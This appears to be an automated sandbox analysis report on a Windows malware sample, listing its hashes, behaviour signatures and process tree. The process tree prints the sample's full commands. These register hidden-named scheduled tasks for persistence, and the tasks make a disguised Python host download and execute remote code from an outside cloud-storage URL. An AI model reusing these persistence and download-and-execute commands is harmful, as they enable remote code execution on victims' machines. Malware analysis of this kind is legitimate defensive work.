Analysis
-
max time kernel
138s -
max time network
60s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
12-07-2021 07:10
Static task
static1
Behavioral task
behavioral1
Sample
7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe
Resource
win7v20210410
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe
Resource
win10v20210410
0 signatures
0 seconds
General
-
Target
7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe
-
Size
4.8MB
-
MD5
0bbe5966c5ea998605215df6ef88ad90
-
SHA1
bce97a45e856b71dc8d48ae12b04f69eb6d191d1
-
SHA256
7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0
-
SHA512
14b74fc9dcd6249bd9c4e4d0a41137898864f7d936d1a4964e212c1f13e60f846107d176d32aba65dac649cc8899d6842744e2909e813f7ab32ece8023a2a3dd
Malware Config
Signatures
-
Executes dropped EXE 4 IoCs
pid Process 1536 ServiceHub.Host.CLR.exe 568 Silverlight.exe 1960 ServiceHub.Host.CLR.exe 1060 install.exe -
Loads dropped DLL 64 IoCs
pid Process 1616 taskeng.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 1536 ServiceHub.Host.CLR.exe 568 Silverlight.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe 1960 ServiceHub.Host.CLR.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 5 Go-http-client/1.1 -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2044 ping.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1108 powershell.exe 1108 powershell.exe 1372 powershell.exe 1372 powershell.exe 612 powershell.exe 612 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1060 install.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1108 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe Token: 35 1536 ServiceHub.Host.CLR.exe Token: SeDebugPrivilege 612 powershell.exe Token: 35 1960 ServiceHub.Host.CLR.exe -
Suspicious use of WriteProcessMemory 53 IoCs
description pid Process procid_target PID 1652 wrote to memory of 2044 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 25 PID 1652 wrote to memory of 2044 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 25 PID 1652 wrote to memory of 2044 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 25 PID 1652 wrote to memory of 1312 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 31 PID 1652 wrote to memory of 1312 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 31 PID 1652 wrote to memory of 1312 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 31 PID 1312 wrote to memory of 1108 1312 cmd.exe 33 PID 1312 wrote to memory of 1108 1312 cmd.exe 33 PID 1312 wrote to memory of 1108 1312 cmd.exe 33 PID 1312 wrote to memory of 428 1312 cmd.exe 34 PID 1312 wrote to memory of 428 1312 cmd.exe 34 PID 1312 wrote to memory of 428 1312 cmd.exe 34 PID 1652 wrote to memory of 920 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 36 PID 1652 wrote to memory of 920 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 36 PID 1652 wrote to memory of 920 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 36 PID 920 wrote to memory of 1372 920 cmd.exe 38 PID 920 wrote to memory of 1372 920 cmd.exe 38 PID 920 wrote to memory of 1372 920 cmd.exe 38 PID 1616 wrote to memory of 1536 1616 taskeng.exe 39 PID 1616 wrote to memory of 1536 1616 taskeng.exe 39 PID 1616 wrote to memory of 1536 1616 taskeng.exe 39 PID 920 wrote to memory of 1864 920 cmd.exe 40 PID 920 wrote to memory of 1864 920 cmd.exe 40 PID 920 wrote to memory of 1864 920 cmd.exe 40 PID 920 wrote to memory of 392 920 cmd.exe 42 PID 920 wrote to memory of 392 920 cmd.exe 42 PID 920 wrote to memory of 392 920 cmd.exe 42 PID 1616 wrote to memory of 568 1616 taskeng.exe 41 PID 1616 wrote to memory of 568 1616 taskeng.exe 41 PID 1616 wrote to memory of 568 1616 taskeng.exe 41 PID 1616 wrote to memory of 568 1616 taskeng.exe 41 PID 1616 wrote to memory of 568 1616 taskeng.exe 41 PID 1616 wrote to memory of 568 1616 taskeng.exe 41 PID 1616 wrote to memory of 568 1616 taskeng.exe 41 PID 1652 wrote to memory of 1308 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 43 PID 1652 wrote to memory of 1308 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 43 PID 1652 wrote to memory of 1308 1652 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe 43 PID 1308 wrote to memory of 612 1308 cmd.exe 45 PID 1308 wrote to memory of 612 1308 cmd.exe 45 PID 1308 wrote to memory of 612 1308 cmd.exe 45 PID 1308 wrote to memory of 1280 1308 cmd.exe 46 PID 1308 wrote to memory of 1280 1308 cmd.exe 46 PID 1308 wrote to memory of 1280 1308 cmd.exe 46 PID 1616 wrote to memory of 1960 1616 taskeng.exe 47 PID 1616 wrote to memory of 1960 1616 taskeng.exe 47 PID 1616 wrote to memory of 1960 1616 taskeng.exe 47 PID 568 wrote to memory of 1060 568 Silverlight.exe 48 PID 568 wrote to memory of 1060 568 Silverlight.exe 48 PID 568 wrote to memory of 1060 568 Silverlight.exe 48 PID 568 wrote to memory of 1060 568 Silverlight.exe 48 PID 568 wrote to memory of 1060 568 Silverlight.exe 48 PID 568 wrote to memory of 1060 568 Silverlight.exe 48 PID 568 wrote to memory of 1060 568 Silverlight.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe"C:\Users\Admin\AppData\Local\Temp\7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\ping.exeping www.baidu.com2⤵
- Runs ping.exe
PID:2044
-
-
C:\Windows\system32\cmd.execmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"2⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Run /TN SYSTEM_SETTINGS3⤵PID:428
-
-
-
C:\Windows\system32\cmd.execmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "2⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Run /TN SYSTEM_TEST3⤵PID:1864
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /DELETE /F /TN SYSTEM_TEST3⤵PID:392
-
-
-
C:\Windows\system32\cmd.execmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"2⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:612
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Run /TN SYSTEM_CDAEMON3⤵PID:1280
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {BFB05B41-B0FE-41D0-8711-279B3F56602D} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exeC:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\')).read().decode())')" a a2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
C:\Users\Public\Silverlight.exeC:\Users\Public\Silverlight.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:568 -
\??\c:\eb4298f7fa175f1b7608d4b9\install.exec:\eb4298f7fa175f1b7608d4b9\install.exe3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:1060
-
-
-
C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exeC:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\')).read().decode())')" a a2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1960
-